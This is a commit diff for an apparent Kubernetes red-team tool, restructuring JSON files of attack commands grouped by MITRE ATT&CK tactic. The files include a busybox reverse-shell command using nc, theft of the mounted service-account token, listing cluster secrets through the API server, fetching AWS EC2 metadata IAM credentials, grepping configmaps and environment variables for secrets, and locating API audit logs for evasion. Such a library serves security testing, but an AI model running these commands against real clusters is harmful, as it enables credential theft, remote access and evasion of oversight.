typo fixes

README.md

@@ -53,15 +53,16 @@ sudo apt-get install -y jq
 ### Commands by MITRE ATT&CK Tactics
 | Tactic | Count |
 |-------|---------|
+| Reconnaissance  | 2 |
 | Initial Access  | 0 |
 | Execution | 0 |
 | Persistence | 2 |
 | Privilege Escalation | 4 |
-| Defense Evasion | 0 |
+| Defense Evasion | 1 |
 | Credential Access | 8 |
-| Discovery | 16 |
+| Discovery | 15 |
 | Lateral Movement | 0 |
-| Collection | 3 |
+| Collection | 1 |
 | Command and Control | 2 |
 | Exfiltration | 1 |
 | Impact | 0 |
@@ -71,6 +72,9 @@ sudo apt-get install -y jq
 
 #2 Second Workshop with Lab03 and Lab04 [Webinar Link](https://www.lightspin.io/webishop-specific-container-security-in-kubernetes)
 
+## BlackHat Asia 2021 Presentation
+#https://www.blackhat.com/asia-21/arsenal/schedule/#red-kube-22401
+
 ## TODO
 
 Defense Evasion: Delete API Audit Logs

attacks/collection.json

@@ -1,35 +1,19 @@
 [
-    {
-        "id": "rk-co01",
-        "name": "collect-images-to-trivy",
-        "description": "collect cluster images",
-        "tactic_id": "TA0009",
-        "mitre_ref": "https://attack.mitre.org/tactics/TA0009/",
-        "mode": "active",
-        "args": "False",
-        "command": "kubectl get pods --all-namespaces -o jsonpath=\"{..image}\" | tr -s '[[:space:]]' '\\n' | sort | uniq > images_list && kubectl cp images_list trivy:images_list",
-        "leading_to": "rk-co02"
-    },
-    {
-        "id": "rk-co02",
-        "name": "scan-image-cves",
-        "description": "collect cves from running images",
-        "tactic_id": "TA0009",
-        "mitre_ref": "https://attack.mitre.org/tactics/TA0009/",
-        "mode": "active",
-        "args": "False",
-        "command": "kubectl exec --stdin --tty trivy -- sh -c \"mkdir scan_results && cat images_list | xargs -I @@ sh -c 'OUT=scan_results/\\`echo @@ | tr / _\\`; trivy image @@ >> \\${OUT}'\"",
-        "leading_to": ["rk-ex01", "rk-ca07"]
-    },
-    {
-        "id": "rk-co03",
-        "name": "print-copy-trivy-results",
-        "description": "print and copy trivy results localy",
-        "tactic_id": "TA0009",
-        "mitre_ref": "https://attack.mitre.org/tactics/TA0009/",
-        "mode": "passove",
-        "args": "False",
-        "command": "kubectl exec --stdin --tty trivy -- sh -c \"grep -i \"critical\" scan_results/*",
-        "leading_to": ""
-    }
+  {
+    "id": "rk-co01",
+    "name": "trivy-cve-scanning",
+    "description": "run trivy, collect cluster images and scan for cves",
+    "tactic_id": "TA0009",
+    "mitre_ref": "https://attack.mitre.org/tactics/TA0009/",
+    "mode": "active",
+    "multistep": true,
+    "args": false,
+    "commands": [
+      "cat <<EOF | kubectl apply -f -\napiVersion: v1\nkind: Pod\nmetadata:\n  name: trivy\nspec:\n  containers:\n  - image: aquasec/trivy\n    name: trivy-scanner\n    command: ['sleep', 'infinity']\nEOF",
+      "kubectl get pods --all-namespaces -o jsonpath=\"{..image}\" | tr -s '[[:space:]]' '\\n' | sort | uniq > images_list && kubectl cp images_list trivy:images_list",
+      "kubectl exec --stdin --tty trivy -- sh -c \"mkdir scan_results && cat images_list | xargs -I @@ sh -c 'OUT=scan_results/\\`echo @@ | tr / _\\`; trivy image @@ >> \\${OUT}'\"",
+      "kubectl cp trivy:scan_results scan_results"
+    ],
+    "leading_to": ""
+  }
 ]

attacks/command_and_control.json

@@ -1,24 +1,34 @@
 [
-    {
+  {
     "id": "rk-cnc01",
     "name": "get-external-ip",
     "description": "get current nat external ip",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "active",
-    "args": "True",
+    "multistep": false,
+    "args": true,
+    "arg_list": [
+      "POD_NAME",
+      "NAMESPACE"
+    ],
     "command": "kubectl exec $POD_NAME -n $NAMESPACE -- curl https://ipinfo.io/json",
     "leading_to": ""
-    },
-    {
+  },
+  {
     "id": "rk-cnc02",
     "name": "open-reverse-shell",
     "description": "creates a busybox container with reverse shell to a dedicated ip and port",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "active",
-    "args": "True",
-    "command": "kubectl run pod-shell --image=busybox -- nc <HOST> <PORT> -e /bin/sh",
+    "multistep": false,
+    "args": true,
+    "arg_list": [
+      "HOST",
+      "PORT"
+    ],
+    "command": "kubectl run pod-shell --image=busybox -- nc $HOST $PORT -e /bin/sh",
     "leading_to": ""
-    }
+  }
 ]

attacks/credential_access.json

@@ -1,90 +1,122 @@
 [
-    {
+  {
     "id": "rk-ca01",
     "name": "get-sensitive-configmaps-keys",
     "description": "get all configmaps with sensitive details in keys",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "passive",
-    "args": "False",
+    "multistep": false,
+    "args": false,
     "command": " kubectl get configmaps --all-namespaces -o json | jq -r '.items[].data | select(. != null)' | awk '{print(tolower($0))}' | jq -r 'with_entries( select(.key|(contains(\"pass\") or contains(\"secret\") or contains(\"token\"))))'",
     "leading_to": ""
-    },
-    {
+  },
+  {
     "id": "rk-ca02",
     "name": "get-sensitive-configmaps-values",
     "description": "get all configmaps with sensitive details in values",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "passive",
-    "args": "False",
+    "multistep": false,
+    "args": false,
     "command": "kubectl get configmaps --all-namespaces -o json | jq -r '.items[].data | select(. != null)' | awk '{print(tolower($0))}' | jq -r 'with_entries( select(.value|(contains(\"pass\") or contains(\"secret\") or contains(\"token\"))))'",
     "leading_to": ""
-    },
-    {
+  },
+  {
     "id": "rk-ca03",
     "name": "get-sensitive-containers-env",
     "description": "get containers with sensitive details in env",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "passive",
-    "args": "False",
-    "command": "kubectl get pods --all-namespaces -o json | jq -r '.items[].spec.containers[].env | select(. != null)' |  awk '{print(tolower($0))}' | jq -r '.[] | select(.name | (contains("pass") or contains("secret") or contains("token")))'"
+    "multistep": false,
+    "args": false,
+    "command": "kubectl get pods --all-namespaces -o json | jq -r '.items[].spec.containers[].env | select(. != null)' |  awk '{print(tolower($0))}' | jq -r '.[] | select(.name | (contains(\"pass\") or contains(\"secret\") or contains(\"token\")))'",
     "leading_to": ""
-    },
-    {
+  },
+  {
     "id": "rk-ca04",
     "name": "steal-container-mounted-token",
     "description": "get the kubernetes token mounted by default",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "passive",
-    "args": "True",
+    "multistep": false,
+    "args": true,
+    "arg_list": [
+      "POD_NAME",
+      "NAMESPACE"
+    ],
     "command": "TOKEN=$(kubectl exec $POD_NAME -n $NAMESPACE -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)",
     "leading_to": "rk-ca06"
-    },
-    {
+  },
+  {
     "id": "rk-ca05",
     "name": "test-k8s-api-comm",
     "description": "test communication to the kubernetes API server",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "active",
-    "args": "True",
+    "multistep": false,
+    "args": true,
+    "arg_list": [
+      "POD_NAME",
+      "NAMESPACE",
+      "API_SERVER",
+      "TOKEN"
+    ],
     "command": "kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api --header 'Authorization: Bearer $TOKEN' --insecure",
     "leading_to": ""
-    },
-    {
+  },
+  {
     "id": "rk-ca06",
     "name": "list-all-cluster-secrets",
     "description": "list all kubernetes cluster secrets",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "active",
-    "args": "True",
+    "multistep": false,
+    "args": true,
+    "arg_list": [
+      "POD_NAME",
+      "NAMESPACE",
+      "API_SERVER",
+      "TOKEN"
+    ],
     "command": "kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api/v1/namespaces/kube-system/secrets --header 'Authorization: Bearer $TOKEN' --insecure",
     "leading_to": ""
-    },
-    {
+  },
+  {
     "id": "rk-ca07",
     "name": " get-ec2-metadata-token",
     "description": "get AWS EC2 instance metadata token",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "active",
-    "args": "True",
+    "multistep": false,
+    "args": true,
+    "arg_list": [
+      "POD_NAME",
+      "NAMESPACE"
+    ],
     "command": "kubectl exec $POD_NAME -n $NAMESPACE -- curl http://169.254.169.254/latest/meta-data/iam/security-credentials/",
     "leading_to": ""
-    },
-    {
+  },
+  {
     "id": "rk-ca08",
     "name": " get-ec2-metadata-token",
     "description": "get AWS EC2 instance metadata token",
     "tactic_id": "TA0011",
     "mitre_ref": "https://attack.mitre.org/tactics/TA0011/",
     "mode": "active",
-    "args": "True",
+    "multistep": false,
+    "args": true,
+    "arg_list": [
+      "POD_NAME",
+      "ROLE"
+    ],
     "command": "ROLE=`kubectl exec --stdin --tty $POD_NAME -- curl 169.254.169.254/latest/meta-data/iam/security-credentials` && kubectl exec --stdin --tty $POD_NAME -- curl 169.254.169.254/latest/meta-data/iam/seurity-credentials/$ROLE",
     "leading_to": ""
-    }
+  }
 ]

attacks/defense_evasion.json

@@ -0,0 +1,14 @@
+[
+  {
+    "id": "rk-de01",
+    "name": "find-audit-logs",
+    "description": "finds the audit log path",
+    "tactic_id": "TA0005",
+    "mitre_ref": "https://attack.mitre.org/tactics/TA0005/",
+    "mode": "passive",
+    "multistep": false,
+    "args": false,
+    "command": "kubectl get pods --namespace kube-system | grep kube-apiserver | awk '{print $1}' | xargs -I @@ sh -c 'kubectl get pod @@ --namespace kube-system  -o json | jq -r \".spec.containers[].args[] | select(.|contains(\\\"--audit\\\"))\"'",
+    "leading_to": ""
+  }
+]